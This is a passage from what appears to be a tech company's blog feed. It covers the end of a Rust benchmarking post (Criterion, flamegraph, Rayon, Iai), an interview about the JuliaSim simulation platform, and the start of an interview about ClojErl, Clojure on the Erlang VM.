&lt;p&gt;It’s worth mentioning that flamegraph orders the function calls on the x-axis alphabetically by default. You can change this if you want, but it wasn’t important for us to know when each function was called; we wanted to know how much time each one took. The flamegraph groups all the different calls to show the total time each function spent in that call stack.&lt;&#x2F;p&gt;
&lt;p&gt;Profiling is important because we didn’t want to make changes without knowing that something was a real performance issue. It helped us discover the specific things that were making our function slower.&lt;&#x2F;p&gt;
&lt;p&gt;So now we have information about the bottlenecks! We only have to look at the call stacks and try to reduce that time where possible.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;gotta-go-fast&quot;&gt;Gotta go fast!&lt;&#x2F;h2&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;f64ca7d4beb9865d2ed5145d120f0c56.gif&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Now we have some information to speed up our function. The first thing we thought of was to integrate &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;rayon-rs&#x2F;rayon&quot;&gt;Rayon&lt;&#x2F;a&gt; into this part. Rayon is a Rust library for turning sequential computations into parallel ones. We started with that.&lt;&#x2F;p&gt;
&lt;p&gt;When we make a change, the first thing we want to check is whether the time has improved, so we go back to Criterion again.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Benchmarking Get Blocks Function&#x2F;benches&#x2F;samples&#x2F;.ledger-2-4: Warming up for 3.0000 s&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Get Blocks Function&#x2F;benches&#x2F;samples&#x2F;.ledger-2-4                                                 &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            time:   [15.985 s 16.246 s 16.482 s]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            change: [-70.886% -70.401% -69.951%]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Performance has improved.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;So here we have the command-line output with a new line. The &lt;strong&gt;change&lt;&#x2F;strong&gt; line shows the improvement or regression compared to the last benchmark run; we can see roughly a 70% improvement, so we are in the happy case. Let’s take a look at the new reports.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;4pFWn55.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;htmlpreview.github.io&#x2F;?https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;how_to_benchmark_blogpost&#x2F;blob&#x2F;main&#x2F;report&#x2F;comparison_report_example.html&quot;&gt;HTML comparison report with our new implementation&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Here we have the new graph. Criterion automatically merged the last two plots and produced one with the comparison, which makes it easy to present these new results.&lt;&#x2F;p&gt;
&lt;p&gt;With a relatively small change, we made an important difference, so this was enough for us, at least for now. If it’s still not fast enough, the good thing is that you can repeat these steps: run flamegraph again, find the slow part of the process, fix it, and go back to Criterion.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;problems-with-rayon-and-criterion&quot;&gt;Problems with Rayon and Criterion&lt;&#x2F;h2&gt;
&lt;p&gt;One thing we encountered is that benchmarking with Rayon and parallel code comes with an extra step. Rayon runs parallel code on an internal thread pool with a default number of threads.&lt;br &#x2F;&gt;
Sometimes this thread pool needs to be bigger for benchmarking, so we had to set up a custom global thread pool using&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;rayon::ThreadPoolBuilder::new()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .stack_size(size)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .num_threads(number_of_threads)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .build_global()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        .expect(&quot;failed to build the global thread pool&quot;);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;This solved our problem and hopefully will solve yours too.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;criterion-and-ci-integration&quot;&gt;Criterion and CI Integration&lt;&#x2F;h2&gt;
&lt;p&gt;At some point, we wanted to check for regressions or improvements on every PR to our repo, to make sure that future changes won’t hurt performance. In short, the idea was to integrate our Criterion benchmarks with CI tools. It turned out that Criterion is not a good option for continuous integration, because the virtualization used by these CI tools &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;bheisler.github.io&#x2F;criterion.rs&#x2F;book&#x2F;faq.html&quot;&gt;introduces noise into the benchmarking process&lt;&#x2F;a&gt;. Criterion’s results may be affected by this noise and show performance changes even when that part of the code was never touched.&lt;&#x2F;p&gt;
&lt;p&gt;Next, we’ll dig into how to make this possible with another tool.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;next-steps-and-how-to-improve-our-benchmarks&quot;&gt;Next steps and how to improve our benchmarks&lt;&#x2F;h2&gt;
&lt;p&gt;At this point, we already used Criterion to set our first time baseline, and then introduced flamegraph to identify bottlenecks in our code. Maybe this is enough, but what if we want to go a little further? It was at this point that we found &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;bheisler.github.io&#x2F;criterion.rs&#x2F;book&#x2F;iai&#x2F;iai.html&quot;&gt;&lt;strong&gt;Iai&lt;&#x2F;strong&gt;&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Iai&lt;&#x2F;strong&gt; is an experimental framework designed for one-shot benchmarking. It runs on Valgrind and uses &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.cs.cmu.edu&#x2F;afs&#x2F;cs.cmu.edu&#x2F;project&#x2F;cmt-40&#x2F;Nice&#x2F;RuleRefinement&#x2F;bin&#x2F;valgrind-3.2.0&#x2F;docs&#x2F;html&#x2F;cg-manual.html#:~:text=Cachegrind%20is%20a%20tool%20for,misses%2C%20writes%20and%20writes%20misses.&quot;&gt;Cachegrind&lt;&#x2F;a&gt; to profile our code. This profiling gives us a different kind of information: the number of instructions our function executes, the accesses to the different cache levels, the accesses to RAM, and the estimated cycles.&lt;br &#x2F;&gt;
All of this comes with some pros and cons to consider:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;✅ High-precision measurements and better performance since Iai executes the benchmark only once.&lt;&#x2F;li&gt;
&lt;li&gt;✅ Making a benchmark in Iai works in a very similar way compared to Criterion, it’s easy to set up and the code structure is almost the same.&lt;&#x2F;li&gt;
&lt;li&gt;✅ Like flamegraph, Iai works as a complement of Criterion and not a competitor.&lt;&#x2F;li&gt;
&lt;li&gt;✅ Iai uses an abstraction (&lt;code&gt;black_box&lt;&#x2F;code&gt;) to prevent the compiler from optimizing the benchmarked code away.&lt;&#x2F;li&gt;
&lt;li&gt;❌ It needs Valgrind to work, so it can’t be used on a platform that doesn’t support Valgrind. We can use it with Docker, but this will definitely slow things down.&lt;&#x2F;li&gt;
&lt;li&gt;❌ It’s not a good fit for measuring a change from sequential to parallel code.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;One of the best things Iai enables is the integration of benchmarks with our CI tools. We mentioned that Criterion is not a good option for this. Iai runs all the benchmarks inside Valgrind&#x2F;Cachegrind, so measurements on a virtual machine won’t be affected by external noise.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;that-s-all-folks&quot;&gt;That’s all, folks!&lt;&#x2F;h2&gt;
&lt;p&gt;We introduced you to the world of benchmarking in Rust, exploring some tools and showing you how to interpret the results they gave us. The world of benchmarking is expansive and exciting, and Criterion is the biggest thing since the invention of sliced bread. Thanks to the flamegraph profiling tool, we learned a lot about the inner workings of the machine-level calls that Rust generates.&lt;&#x2F;p&gt;
&lt;p&gt;As a result of this journey, our code improved a lot without losing readability. We did, however, spend &lt;strong&gt;a lot of time&lt;&#x2F;strong&gt; on subsequent iterations of the function to achieve this. So take into account that benchmarking and profiling should only be used when performance gains are crucial to your project. Don’t lose sleep over functions that don’t use many resources; you should trust us on this one.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Simulations are about to get way, way faster with JuliaSim</title>
          <pubDate>Thu, 02 Sep 2021 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/simulations-are-about-to-get-way-way-faster-with-juliasim/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/simulations-are-about-to-get-way-way-faster-with-juliasim/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/simulations-are-about-to-get-way-way-faster-with-juliasim/">&lt;p&gt;Today we’re excited to bring you a first glance at the result of a major multi-year project by the Julia Computing team.&lt;&#x2F;p&gt;
&lt;p&gt;JuliaSim is a cloud-based simulation platform built on top of the Julia open source stack, including SciML and ModelingToolkit, which we explored in depth &lt;a href=&quot;&#x2F;scientific-machine-learning-with-julia-the-sciml-ecosystem&#x2F;&quot;&gt;here&lt;&#x2F;a&gt; and &lt;a href=&quot;&#x2F;modeling-complexity-with-symbolics-jl-and-modelingtoolkit-jl&#x2F;&quot;&gt;here&lt;&#x2F;a&gt;, respectively. These were just the base of JuliaSim, which aims to change the way the industry does modeling and simulation with powerful acceleration and integration within a complete ecosystem.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;juliacomputing.com&#x2F;products&#x2F;juliasim&#x2F;&quot;&gt;JuliaSim&lt;&#x2F;a&gt;’s first beta will be released in a few months. We interviewed Chris Rackauckas to learn more about the project.&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;h4 id=&quot;what-is-juliasim-how-does-it-compare-to-alternatives-like-modelica-dymola&quot;&gt;What is JuliaSim? How does it compare to alternatives like Modelica&#x2F;Dymola?&lt;&#x2F;h4&gt;
&lt;p&gt;JuliaSim is a cloud-based platform for accelerated modeling and simulation. Unlike tools like Dymola, it integrates with a large open source community, the Julia programming language and the SciML ecosystem, to enhance its environment with offerings like easy parallelism, automated generation of ML surrogate models, and much more. In &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.youtube.com&#x2F;watch?v=lNbU5jNp67s&quot;&gt;a recent talk at JuliaCon 2021&lt;&#x2F;a&gt; I highlight this community integration as one of its core aspects that gives JuliaSim a competitive advantage in terms of features and performance, since it allows us to contribute to and benefit from the work of many scientists and engineers from across the world.&lt;&#x2F;p&gt;
&lt;p&gt;While JuliaSim has acausal modeling as one of its core features, unlike in Modelica-based tools it is just one of its domains. Accelerated simulation of PDEs with neural networks, integrating stochastic simulation into workflows, specific simulation environments for pharmacology and circuit modeling, and much more are all part of the JuliaSim product. We see the future as a place where composability will be necessary to achieve the next level of simulations.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;can-it-integrate-with-the-fmi-will-we-be-able-to-use-models-written-in-e-g-modelica-inside-juliasim&quot;&gt;Can it integrate with the FMI? Will we be able to use models written in, e.g. Modelica, inside JuliaSim?&lt;&#x2F;h4&gt;
&lt;p&gt;Yes, JuliaSim at its release will offer features for integrating with the FMI standard, allowing for FMI imports and FMI exports. This will allow for example the ability to build surrogates of models from Modelica or Simulink platforms, and allow for generating binaries that can integrate back into these platforms.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;a-key-aspect-of-modelica-is-its-standard-library-which-includes-many-of-the-most-common-components-for-modeling-will-there-be-a-similar-thing-in-juliasim&quot;&gt;A key aspect of Modelica is its standard library, which includes many of the most common components for modeling. Will there be a similar thing in JuliaSim?&lt;&#x2F;h4&gt;
&lt;p&gt;With JuliaSim we are building a standard library which includes similar domains to the Modelica Standard Library, but also includes many other domains related to the customers we have been working with. For example, with JuliaSim one will be able to easily search a database of hundreds of physiological and systems biological models for accelerating workflows in biomedical simulation and drug development. We plan to continually improve this model library and mold it to the needs of our customers.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;what-are-surrogate-models-what-makes-them-important-especially-beyond-academic-applications&quot;&gt;What are surrogate models? What makes them important, especially beyond academic applications?&lt;&#x2F;h4&gt;
&lt;p&gt;Surrogate models are an amortization of compute cost to improve simulation workflows. It gives you a way to say “do 100 simulations now, and all of my future simulations are 100x faster”. When you mix this with cloud resources you can get a major workflow update: pay for a bit of cloud compute to spawn a bunch of simulations in parallel, but now every time you click the simulate button you do not have to wait 30 minutes to check the result.&lt;&#x2F;p&gt;
&lt;p&gt;When I was in graduate school I noticed that there is a very nonlinear effect of code speed on productivity which I captured in a &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.stochasticlifestyle.com&#x2F;the-nonlinear-effect-of-code-speed-on-productivity&quot;&gt;blog post&lt;&#x2F;a&gt;. If you have to wait 30 minutes for a result, that means that instead you’ll start it before lunch or before a 1 hour meeting, so the true “time to see simulation results” gets amplified further. 2 hour simulations are something you will start in the morning and check at night. Thus a surrogate changing a long simulation to something that you can analyze in real-time is invaluable to decreasing labor costs because of how simulation time affects the day-to-day life of an engineer.&lt;&#x2F;p&gt;
&lt;p&gt;While in an academic sense we focus on issues like “training the surrogate costs 100 simulations, but we needed 10,000 simulations to optimize the building design and thus we saved in the end”, I do not think this calculus is really the major change that surrogates will bring. Even if it takes 100 simulations to train a surrogate that you use 10 times, if you integrate this with cloud compute to do those all in parallel, then to the user you only have to sit through what is effectively 2 simulations. If that’s a two hour simulation time, you’ve now changed a workflow that takes a full day to something that you set to train in the morning and then after lunch you can interactively fiddle with parameters until your controls are correct. And then any time you revisit in the future, it’s ready to be fiddled with again. When you view surrogates in this light, I think you can see why we believe this will be a gamechanger for the everyday engineer.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;one-of-the-main-innovations-brought-by-juliasim-is-the-generation-of-fast-and-accurate-surrogate-models-that-can-speedup-simulations-as-much-as-500x-even-in-the-presence-of-stiff-models-how-is-this-achieved-what-s-a-ctesn&quot;&gt;One of the main innovations brought by JuliaSim is the generation of fast and accurate surrogate models that can speedup simulations as much as 500x, even in the presence of stiff models. How is this achieved? What’s a CTESN?&lt;&#x2F;h4&gt;
&lt;p&gt;A continuous-time echo state network (CTESN) is an implicitly trained machine learning framework for capturing the dynamics of stiff models. These are models with phase transitions, fast transient behavior, and are well-known to be numerically difficult. Across many domains we have shown the CTESN training procedure to be robust due to how it incorporates implicit features of stable differential equation solvers. All that we need to generate it is a chunk of simulations done beforehand, and what results is this really fast object that will predict the simulation behavior at new parameters.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;how-easy-is-it-to-compose-surrogate-models-with-normal-ones-in-juliasim-what-are-the-advantages-of-this-approach&quot;&gt;How easy is it to compose surrogate models with normal ones in JuliaSim? What are the advantages of this approach?&lt;&#x2F;h4&gt;
&lt;p&gt;The CTESN represents the surrogate of a differential equation model as a differential equation model. Because of this representation, it’s not different from the other physical components. As long as you train it to cover the right states and observables, it will slot right into where you had the larger model before.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;paramount-to-surrogatization-is-the-ability-to-check-the-accuracy-of-the-surrogate-model-and-its-performance-against-the-original-one-how-does-juliasim-tackle-this-are-these-metrics-appropriately-exposed-to-the-user&quot;&gt;Paramount to surrogatization is the ability to check the accuracy of the surrogate model and its performance against the original one. How does JuliaSim tackle this? Are these metrics appropriately exposed to the user?&lt;&#x2F;h4&gt;
&lt;p&gt;JuliaSim generates diagnostics of the surrogate training process to signal to the user important features like the projected maximum error over the timeseries over the user-defined parameter space. A lot of this is done through quasi-random sampling right now, though we are investigating more complex techniques to more quickly achieve good estimates.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;does-juliasim-run-on-top-of-juliahub-or-are-they-separate-things-is-the-pricing-model-expected-to-be-the-same&quot;&gt;Does JuliaSim run on top of &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;juliahub.com&#x2F;lp&#x2F;&quot;&gt;JuliaHub&lt;&#x2F;a&gt; or are they separate things? Is the pricing model expected to be the same?&lt;&#x2F;h4&gt;
&lt;p&gt;JuliaSim is a JuliaHub-based platform. JuliaSim users receive a subscription to a set of proprietary packages, such as the standard library and the surrogatization tools, which grants access to their use on JuliaHub. The pricing model of JuliaSim is simply the subscription plus pay-for-compute, so users only pay for what they use but have access to the full suite.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;will-there-be-a-gui-for-modeling-or-will-we-mostly-have-to-write-all-the-julia-code-explicitly&quot;&gt;Will there be a GUI for modeling or will we mostly have to write all the Julia code explicitly?&lt;&#x2F;h4&gt;
&lt;p&gt;There will be many GUIs! The first GUI that we are building is more pharmaceutical modeling focused given our early customer base and connections with Pumas-AI. This allows for quickly building chemical reaction network and systems pharmacology models, and representing models in a visual form for presentations and reporting. It also will serve as the basis for visual programming of compartmental models in pharmacokinetics. We also will have a GUI at launch which simplifies the FMU surrogatization process, allowing non-Julia users to quickly accelerate their FMUs by entering in parameter information and clicking “surrogatize”. We have other GUIs planned for the near future as well, such as GUIs for block diagrams and acausal modeling, along with 3D visualization tools.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;juliasim-is-launching-pretty-soon-what-can-we-expect-from-this-first-version-what-features-are-next&quot;&gt;JuliaSim is launching pretty soon; what can we expect from this first version? What features are next?&lt;&#x2F;h4&gt;
&lt;p&gt;JuliaSim’s first beta will be launching fairly soon. I wouldn’t call it the first version quite yet, though the beta will already be usable as we have been working with a group of customers to showcase the performance advantage for their specific applications. The first release will be a mix of GUIs, cloud parallel surrogatization, and standard libraries. And for the future we are aiming for a lot more. The full vision of JuliaSim is expressed in &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.youtube.com&#x2F;watch?v=lNbU5jNp67s&quot;&gt;the JuliaCon 2021 video&lt;&#x2F;a&gt; so refer to that for more details.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>BEAM all the things! ClojErl, an implementation of Clojure on the Erlang Virtual Machine</title>
          <pubDate>Thu, 15 Jul 2021 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/clojerl-an-implementation-of-the-clojure-language-that-runs-on-the-beam/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/clojerl-an-implementation-of-the-clojure-language-that-runs-on-the-beam/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/clojerl-an-implementation-of-the-clojure-language-that-runs-on-the-beam/">&lt;h4 id=&quot;an-interview-with-its-creator-juan-facorro&quot;&gt;&lt;strong&gt;An interview with its creator, Juan Facorro.&lt;&#x2F;strong&gt;&lt;&#x2F;h4&gt;
&lt;hr &#x2F;&gt;
&lt;p&gt;Our blog has had a long standing interest in novel uses of the BEAM, or Erlang virtual machine, as shown by the many articles we have published on that topic: we talked to Eric Merritt about &lt;a href=&quot;&#x2F;eric-merritt-erlang-and-distributed-systems-expert-gives-his-views-on-beam-languages-hindley&#x2F;&quot;&gt;languages that run on BEAM&lt;&#x2F;a&gt; from a high-level overview, and went deep on &lt;a href=&quot;&#x2F;an-interview-with-the-creator-of-gleam-an-ml-like-language-for-the-erlang-vm-with-a-compiler&#x2F;&quot;&gt;Gleam&lt;&#x2F;a&gt; (an ML-like language for the Erlang VM with a compiler written in Rust), &lt;a href=&quot;&#x2F;d-day-invasion-with-mlfe-ml-landing-in-the-erlang-world&#x2F;&quot;&gt;MLFE&lt;&#x2F;a&gt; (which is short for ML-Flavored Erlang), &lt;a href=&quot;&#x2F;efene-an-erlang-vm-language-that-embraces-the-python-zen&#x2F;&quot;&gt;Efene&lt;&#x2F;a&gt; (an alternative syntax for Erlang), &lt;a href=&quot;&#x2F;gaming-with-elixir-discovering-new-lands-in-the-beam-realm&#x2F;&quot;&gt;using Elixir for videogame backends&lt;&#x2F;a&gt;, and &lt;a href=&quot;&#x2F;lasp-a-little-further-down-the-erlang-rabbithole&#x2F;&quot;&gt;Lasp&lt;&#x2F;a&gt; (“a suite of libraries aimed at providing a comprehensive programming system for planetary scale Elixir and Erlang applications”).&lt;&#x2F;p&gt;
&lt;p&gt;We also published a guide to learn &lt;a href=&quot;&#x2F;how-to-earn-your-clojure-white-belt&#x2F;&quot;&gt;Clojure&lt;&#x2F;a&gt; and an &lt;a href=&quot;&#x2F;a-pythonist-finds-a-new-home-at-clojure-land&#x2F;&quot;&gt;interview&lt;&#x2F;a&gt; that might persuade you to get into it if you haven’t already.&lt;&#x2F;p&gt;
&lt;p&gt;So our readers will understand it was inevitable for us to be interested in Juan Facorro’s project, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;clojerl&#x2F;clojerl&quot;&gt;ClojErl&lt;&#x2F;a&gt;. And of course, we interviewed him about it. We hope you enjoy it as much as we did.&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;h4 id=&quot;tell-us-a-little-about-clojerl-what-is-it-how-did-it-come-about&quot;&gt;&lt;strong&gt;Tell us a little about ClojErl, what is it? How did it come about?&lt;&#x2F;strong&gt;&lt;&#x2F;h4&gt;
&lt;p&gt;ClojErl is an implementation of the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;clojure.org&#x2F;&quot;&gt;Clojure&lt;&#x2F;a&gt; language that runs on the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;BEAM_(Erlang_virtual_machine)&quot;&gt;BEAM&lt;&#x2F;a&gt; (the Erlang Virtual Machine).&lt;&#x2F;p&gt;
&lt;p&gt;The project started as a learning and exploratory exercise on language implementation. The idea was born out of the combination of my desire to use Clojure at work, and me starting a new job at &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;inaka.github.io&#x2F;&quot;&gt;Inaka&lt;&#x2F;a&gt; where I learned to use Erlang (and the BEAM) to build systems.&lt;&#x2F;p&gt;
&lt;p&gt;I found that the concurrency model of the BEAM made sense to me, because it provided a framework and some guarantees that made it simple for me to think about concurrency. This has not been the case for me with other concurrency models.&lt;&#x2F;p&gt;
&lt;p&gt;The BEAM was built to solve a practical problem (i.e. high availability communication switches) and solving for concurrency was a big part of the solution, which also included immutable data structures. These two concepts, concurrency and immutability, are also at the core of Clojure’s design principles, so it seemed like a good idea to try to bring this language to the BEAM.&lt;&#x2F;p&gt;
&lt;p&gt;I’m not sure if I thought about it at the time, but the abstractions on which Clojure is built make using the language a pleasure. The example that I always use is the fact that you can use the &lt;strong&gt;count&lt;&#x2F;strong&gt; core function with almost any data structure (it only needs to implement the &lt;strong&gt;ICounted&lt;&#x2F;strong&gt; protocol). Even though it is possible to define a function like this in Erlang, I think the resulting code would not be idiomatic Erlang and it would be hard both to maintain and to extend to new types. This is not the case with Clojure.&lt;&#x2F;p&gt;
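&lt;p&gt;As a small illustrative sketch of that uniformity (the protocol name &lt;strong&gt;ICounted&lt;&#x2F;strong&gt; is the one mentioned above; JVM Clojure implements the same idea through interfaces):&lt;&#x2F;p&gt;

```clojure
;; count works on almost any data structure, because each type
;; implements the counting protocol (ICounted in ClojErl):
(count [1 2 3])       ;; vector -> 3
(count {:a 1 :b 2})   ;; map    -> 2
(count "hello")       ;; string -> 5
(count nil)           ;; nil    -> 0
```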
&lt;h4 id=&quot;what-advantages-does-the-actor-model-bring-over-clojure-s-concurrency-model&quot;&gt;&lt;strong&gt;What advantages does the actor model bring over clojure’s concurrency model?&lt;&#x2F;strong&gt;&lt;&#x2F;h4&gt;
&lt;p&gt;I don’t think there are absolute advantages of one model over the other.&lt;&#x2F;p&gt;
&lt;p&gt;Because of the way systems are built on the BEAM and the tools it provides (i.e. lightweight processes, monitors and links), it is very suitable for building resilient systems that (when designed right) can recover from failure. This can arguably be done with any language and platform (e.g. Akka on the JVM), but I think it is simpler and easier to do when using the BEAM.&lt;&#x2F;p&gt;
&lt;p&gt;Other things are harder and end up being more complex when using Erlang, but I have wondered if this is more related to the size of the community and the problems it is solving than to the language itself. The number of Elixir libraries that have been written to do almost anything would suggest that this is very likely the case.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;when-would-clojerl-be-a-better-choice-than-regular-jvm-clojure&quot;&gt;&lt;strong&gt;When would ClojErl be a better choice than regular JVM clojure?&lt;&#x2F;strong&gt;&lt;&#x2F;h4&gt;
&lt;p&gt;I would say that whenever you need to build a system that is resilient, degrades gracefully and can recover from failures, and you don’t want to spend time on building the mechanism to achieve this from scratch. Using ClojErl will provide a battle-tested platform where all these things are already included in the VM’s design and how systems are built on it.&lt;&#x2F;p&gt;
&lt;p&gt;This assumes that you don’t need a very purpose-specific library that exists only in Java, or a Clojure library that is a lot of work to port from Clojure(Script) into ClojErl.&lt;&#x2F;p&gt;
&lt;p&gt;It also assumes that there is a library (either in Erlang or maybe other BEAM language) for every one of your needs, which unfortunately is sometimes not the case.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;how-much-impact-does-losing-java-interop-have-on-the-language-in-everyday-use&quot;&gt;&lt;strong&gt;How much impact does losing Java interop have on the language in everyday use?&lt;&#x2F;strong&gt;&lt;&#x2F;h4&gt;
&lt;p&gt;There is no impact as far as I can tell, although I’m biased :).&lt;&#x2F;p&gt;
&lt;p&gt;Anything that would necessitate Java interop is either replaced with Erlang interop or an implementation of the set of protocols through which Clojure interacts with the platform (e.g. &lt;strong&gt;IWriter&lt;&#x2F;strong&gt; and &lt;strong&gt;IReader&lt;&#x2F;strong&gt; for I&#x2F;O).&lt;&#x2F;p&gt;
&lt;h4 id=&quot;there-are-certain-clojure-features-that-are-unsupported-why-is-that&quot;&gt;&lt;strong&gt;There are certain Clojure features that are unsupported. Why is that?&lt;&#x2F;strong&gt;&lt;&#x2F;h4&gt;
&lt;p&gt;Clojure JVM is implemented on a platform that allows mutability, which is not the case on the BEAM.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;clojure.org&#x2F;reference&#x2F;transients&quot;&gt;Transient data structures&lt;&#x2F;a&gt; for example, rely on the fact that parts of the underlying representation can be updated in-place. The whole point of their existence is to allow for faster operations without the cost of creating new instances after each modification. This cannot be achieved on the BEAM if we want to use the native immutable data structures.&lt;&#x2F;p&gt;
&lt;p&gt;I have not explored the path of implementing a whole set of data structures through &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;erlang.org&#x2F;doc&#x2F;tutorial&#x2F;nif.html&quot;&gt;NIFs&lt;&#x2F;a&gt; that would maybe make this possible. I’m not convinced this is a good idea though, for a number of reasons. The first one is that it would be a lot of work and we would end up with an implementation that needs to be battle-tested before it can be relied upon. The second is that the cost of calling a NIF is not zero and the result might not even provide significant performance gains. And the third is that it would not be possible to use any of the built-in Erlang functions from the standard library or any of the optimizations for them added to the BEAM.&lt;&#x2F;p&gt;
&lt;p&gt;Another feature that is not implemented for Clojure on the BEAM is &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;clojure.org&#x2F;reference&#x2F;refs&quot;&gt;Refs and Transactions&lt;&#x2F;a&gt;. This feature is heavily dependent on how the JVM works and it is also not something that is very widely used (as far as I know) in the wild.&lt;&#x2F;p&gt;
&lt;p&gt;ClojErl relies only on the numeric types provided by the platform. This means that things such as ratios, big decimals, and flags about unchecked math are not available. The BEAM is not designed to provide good performance around numerical operations, so if that is your use case you are better off using another set of tools for that purpose.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;how-good-is-the-interoperability-with-erlang-what-about-elixir&quot;&gt;&lt;strong&gt;How good is the interoperability with Erlang? What about Elixir?&lt;&#x2F;strong&gt;&lt;&#x2F;h4&gt;
&lt;p&gt;One of the design principles for ClojErl was to make interoperability with the platform as seamless as possible.&lt;&#x2F;p&gt;
&lt;p&gt;A function call to an Erlang function is equivalent to any other Clojure function call: &lt;strong&gt;(module&#x2F;function arg1 arg2 … argN)&lt;&#x2F;strong&gt;.&lt;&#x2F;p&gt;
